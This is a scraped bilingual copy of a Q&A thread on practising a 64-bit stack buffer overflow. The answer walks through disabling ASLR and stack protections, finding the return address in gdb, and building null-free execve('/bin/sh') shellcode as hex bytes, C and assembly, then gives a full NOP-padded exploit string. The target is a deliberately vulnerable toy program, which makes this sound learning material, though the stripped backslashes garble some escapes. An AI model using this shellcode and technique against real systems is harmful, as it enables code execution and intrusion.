64 位缓冲区溢出 [英] Buffer overflows on 64 bit

查看:51
本文介绍了64 位缓冲区溢出的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

为了好玩,我正在尝试做一些缓冲区溢出的实验.我正在这个论坛上阅读有关该主题的内容,并尝试编写自己的小代码.

I am trying to do some experiments with buffer overflows for fun. I was reading on this forum on the topic, and tried to write my own little code.

所以我做的是一个小的C"程序,它接受字符参数并运行直到分段错误.

So what I did is a small "C" program, which takes character argument and runs until segmentation fault.

所以我提供参数,直到我收到一条消息,我用A"覆盖了返回地址,即 41.我的缓冲区字符长度,在其中复制我的输入字符串是 [5].

So I supply arguments until I get a message that I overwrote the return address with "A" which is 41. My buffer character length, in which I copy my input strings is [5].

这是我在 gdb 中所做的.

Here is what I did in gdb.

run $(perl -e 'print "A"x32  ; ')
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400516 in main (argc=Cannot access memory at address 0x414141414141412d

然后我发现覆盖需要 16 个A".

Then I figured out that it takes 16 'A' to overwrite.

run $(perl -e 'print "A"x16 . "C"x8 . "B"x32   ; ')
0x0000000000400516 in main (argc=Cannot access memory at address 0x434343434343432f
) 

这告诉我们 8 个C"正在覆盖返回地址.

Which tells us that the 8 "C" are overwriting the return address.

根据在线教程,如果我提供有效地址而不是 8 个C".我可以跳到某个地方并执行代码.所以我在最初的16个A"之后重载了内存.

According to the online tutorials if I supply a valid adress instead of the 8 "C". I can jump to some place and execute code. So I overloaded the memory after the initial 16 "A".

下一步是执行

run $(perl -e 'print "A"x16 . "C"x8 . "B"x200   ; ')

rax            0x0      0
rbx            0x3a0001bbc0     249108216768
rcx            0x3a00552780     249113683840
rdx            0x3a00553980     249113688448
rsi            0x42     66
rdi            0x2af9e57710e0   47252785008864
rbp            0x4343434343434343       0x4343434343434343
rsp            0x7fffb261a2e8   0x7fffb261a2e8
r8             0xffffffff       4294967295
r9             0x0      0
r10            0x22     34
r11            0xffffffff       4294967295
r12            0x0      0
r13            0x7fffb261a3c0   140736186131392
r14            0x0      0
r15            0x0      0
rip            0x400516 0x400516 <main+62>
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
mxcsr          0x1f80   [ IM DM ZM OM UM PM ]

在 $rsp 之后检查内存 200 字节后,我找到了一个地址,并执行了以下操作:

After examining the memory 200 bytes after $rsp i found an address and I did the following:

run $(perl -e 'print "A"x16 . "x38xd0xcbx9bxffx7f" . "x90"x50 . "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcdx80"   ; ')

然而这并没有做任何事情.如果有人能告诉我我做错了什么,我将不胜感激.

This however does not do anything. I would be grateful if someone can give me an idea what am I doing wrong.

推荐答案

首先确保您更改了 randomize_va_space.在 Ubuntu 上,您将以 root 身份运行以下命令
echo 0 >/proc/sys/kernel/randomize_va_space

First make sure that you change the randomize_va_space. On Ubuntu you would run the following as root
echo 0 > /proc/sys/kernel/randomize_va_space

接下来确保您在编译没有堆栈粉碎保护的测试程序并设置内存执行位.使用以下 gcc 选项编译它以完成
-fno-stack-protector -z execstack

Next make sure you are compiling the test program without stack smashing protection and set the memory execution bit. Compile it with the following gcc options to accomplish
-fno-stack-protector -z execstack

此外,我发现我需要更多空间来实际执行 shell,因此我会将您的缓冲区更改为更像缓冲区 [64]

Also I found I needed more space to actually execute a shell so I would change your buffer to something more like buffer[64]

接下来可以在gdb中运行app,获取需要返回的栈地址
先在strcpy之后设置断点

Next you can run the app in gdb and get the stack address you need to return to
First set a breakpoint right after the strcpy

(gdb) disassemble main
Dump of assembler code for function main:
   0x000000000040057c <+0>: push   %rbp
   0x000000000040057d <+1>: mov    %rsp,%rbp
   0x0000000000400580 <+4>: sub    $0x50,%rsp
   0x0000000000400584 <+8>: mov    %edi,-0x44(%rbp)
   0x0000000000400587 <+11>:    mov    %rsi,-0x50(%rbp)
   0x000000000040058b <+15>:    mov    -0x50(%rbp),%rax
   0x000000000040058f <+19>:    add    $0x8,%rax
   0x0000000000400593 <+23>:    mov    (%rax),%rdx
   0x0000000000400596 <+26>:    lea    -0x40(%rbp),%rax
   0x000000000040059a <+30>:    mov    %rdx,%rsi
   0x000000000040059d <+33>:    mov    %rax,%rdi
   0x00000000004005a0 <+36>:    callq  0x400450 <strcpy@plt>
   0x0000000000**4005a5** <+41>:    lea    -0x40(%rbp),%rax
   0x00000000004005a9 <+45>:    mov    %rax,%rsi
   0x00000000004005ac <+48>:    mov    $0x400674,%edi
   0x00000000004005b1 <+53>:    mov    $0x0,%eax
   0x00000000004005b6 <+58>:    callq  0x400460 <printf@plt>
   0x00000000004005bb <+63>:    mov    $0x0,%eax
   0x00000000004005c0 <+68>:    leaveq 
   0x00000000004005c1 <+69>:    retq   
End of assembler dump.
(gdb) b *0x4005a5
Breakpoint 1 at 0x4005a5

然后运行应用程序并在断点处获取 rax 寄存器地址.

Then run the app and at the break point grab the rax register address.

(gdb) run `python -c 'print "A"*128';`
Starting program: APPPATH/APPNAME `python -c 'print "A"*128';`

Breakpoint 1, 0x00000000004005a5 in main ()
(gdb) info register
rax            0x7fffffffe030   140737488347136
rbx            0x0  0
rcx            0x4141414141414141   4702111234474983745
rdx            0x41 65
rsi            0x7fffffffe490   140737488348304
rdi            0x7fffffffe077   140737488347255
rbp            0x7fffffffe040   0x7fffffffe040
rsp            0x7fffffffdff0   0x7fffffffdff0
r8             0x7ffff7dd4e80   140737351863936
r9             0x7ffff7de9d60   140737351949664
r10            0x7fffffffdd90   140737488346512
r11            0x7ffff7b8fd60   140737349483872
r12            0x400490 4195472
r13            0x7fffffffe120   140737488347424
r14            0x0  0
r15            0x0  0
rip            0x4005a5 0x4005a5 <main+41>
eflags         0x206    [ PF IF ]
cs             0x33 51
ss             0x2b 43
ds             0x0  0
es             0x0  0
fs             0x0  0
gs             0x0  0
(gdb)

接下来确定您的最大缓冲区大小.我知道 64 的缓冲区在 72 字节时崩溃,所以我会从那个开始......你可以使用类似 metasploits 模式的方法来给你这个,或者只是通过运行应用程序的反复试验来找出确切的字节在出现段错误之前计算它需要的时间,或者创建自己的模式并像使用 metasploit 模式选项一样匹配 rip 地址.

Next determine your max buffer size. I know that the buffer of 64 crashes at 72 bytes so I will just go from that.. You could use something like metasploits pattern methods to give you this or just figure it out from trial and error running the app to find out the exact byte count it takes before getting a segfault or make up a pattern of your own and match the rip address like you would with the metasploit pattern option.

接下来,有许多不同的方法可以获取您需要的有效负载,但由于我们运行的是 64 位应用程序,因此我们将使用 64 位有效负载.我编译了 C,然后从 gdb 中获取了 ASM,然后通过将 mov 指令更改为 xor 来删除空值,然后通过 shl 和 shr 将它们从 shell 命令中删除,从而进行了一些更改以删除 x00 字符.我们稍后会展示这一点,但目前有效载荷如下.

Next, there are many different ways to get the payload you need but since we are running a 64bit app, we will use a 64bit payload. I compiled C and then grabbed the ASM from gdb and then made some changes to remove the x00 chars by changing the mov instructions to xor for the null values and then shl and shr to remove them from the shell command. We will show this later but for now the payload is as follows.

<代码>x48x31xd2x48x89xd6x48xbfx2fx62x69x6ex2fx73x68x11x48xc1xe7x08x48xc1xefx08x57x48x89xe7x48xb8x3bx11x11x11x11x11x11x11x48xc1xe0x38x48xc1xe8x38xfx05

我们这里的有效载荷是 48 个字节,所以我们有 72 - 48 = 24

our payload here is 48 bytes so we have 72 - 48 = 24

我们可以用 x90 (nop) 填充有效载荷,这样指令就不会被中断.我将在有效载荷的末尾添加 2,在开头添加 22.此外,我将添加我们想要反向结束的返回地址,给出以下内容..

We can pad the payload with x90 (nop) so that instruction will not be interrupted. Ill add 2 at the end of the payload and 22 at the beginning. Also I will tack on the return address that we want to the end in reverse giving the following..

`python -c 'print "x90"*22+"x48x31xd2x48x89xd6x48xbfx2fx62x69x6ex2fx73x68x11x48xc1xe7x08x48xc1xefx08x57x48x89xe7x48xb8x3bx11x11x11x11x11x11x11x48xc1xe0x38x48xc1xe8x38x0fx05x90x90x30xe0xffxffxffx7f"';`

现在,如果你想在 gdb 之外运行它,你可能不得不捏造返回地址.在我的情况下,地址变为 gdb 之外的 x70xe0xffxffxffx7f.我只是增加了它,直到它工作到 40 然后 50 然后 60 然后 70..

Now if you want to run it outside of gdb, you may have to fudge with the return address. In my case the address becomes x70xe0xffxffxffx7f outside of gdb. I just increased it until it worked by going to 40 then 50 then 60 then 70..

测试应用源

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char name[64];

  strcpy(name, argv[1]);
  printf("Arg[1] is :%s
", name);

  return 0;
}

这是C中的payload

This is the payload in C

#include <stdlib.h>

int main()
{
  execve("/bin/sh", NULL, NULL);
}

以及将构建和运行的 ASM 中的有效载荷

And payload in ASM which will build and run

int main() {
  __asm__(
    "mov    $0x0,%rdx
	"                // arg 3 = NULL
    "mov    $0x0,%rsi
	"                // arg 2 = NULL
    "mov    $0x0068732f6e69622f,%rdi
	"
    "push   %rdi
	"                     // push "/bin/sh" onto stack
    "mov    %rsp,%rdi
	"                // arg 1 = stack pointer = start of /bin/sh
    "mov    $0x3b,%rax
	"               // syscall number = 59
    "syscall
	"
  );
}

而且由于我们不能使用 x00,我们可以更改为 xor 值并进行一些花哨的转换以删除 mov 的错误值以设置/bin/sh

And since we can't use x00 we can change to xor the values and do some fancy shifting to remove the bad values of the mov for setting up /bin/sh

int main() {
  __asm__(
    "xor    %rdx,%rdx
	"                // arg 3 = NULL
    "mov    %rdx,%rsi
	"                // arg 2 = NULL
    "mov    $0x1168732f6e69622f,%rdi
	"
    "shl    $0x8,%rdi
	"                
    "shr    $0x8,%rdi
	"                // first byte = 0 (8 bits)
    "push   %rdi
	"                     // push "/bin/sh" onto stack
    "mov    %rsp,%rdi
	"                // arg 1 = stack ptr = start of /bin/sh
    "mov    $0x111111111111113b,%rax
	" // syscall number = 59
    "shl    $0x38,%rax
	"         
    "shr    $0x38,%rax
	"               // first 7 bytes = 0 (56 bits)
    "syscall
	"
  );
}

如果你编译那个payload,在gdb下运行它,你可以得到你需要的字节值,比如

if you compile that payload, run it under gdb you can get the byte values you need such as

(gdb) x/bx main+4
0x400478 <main+4>:  0x48
(gdb) 
0x400479 <main+5>:  0x31
(gdb) 
0x40047a <main+6>:  0xd2
(gdb)

或者通过做类似的事情来获得一切

or get it all by doing something like

(gdb) x/48bx main+4
0x4004f0 <main+4>:  0x48    0x31    0xd2    0x48    0x89    0xd6    0x48    0xbf
0x4004f8 <main+12>: 0x2f    0x62    0x69    0x6e    0x2f    0x73    0x68    0x11
0x400500 <main+20>: 0x48    0xc1    0xe7    0x08    0x48    0xc1    0xef    0x08
0x400508 <main+28>: 0x57    0x48    0x89    0xe7    0x48    0xb8    0x3b    0x11
0x400510 <main+36>: 0x11    0x11    0x11    0x11    0x11    0x11    0x48    0xc1
0x400518 <main+44>: 0xe0    0x38    0x48    0xc1    0xe8    0x38    0x0f    0x05

这篇关于64 位缓冲区溢出的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!

查看全文
登录 关闭
扫码关注1秒登录
发送“验证码”获取 | 15天全站免登陆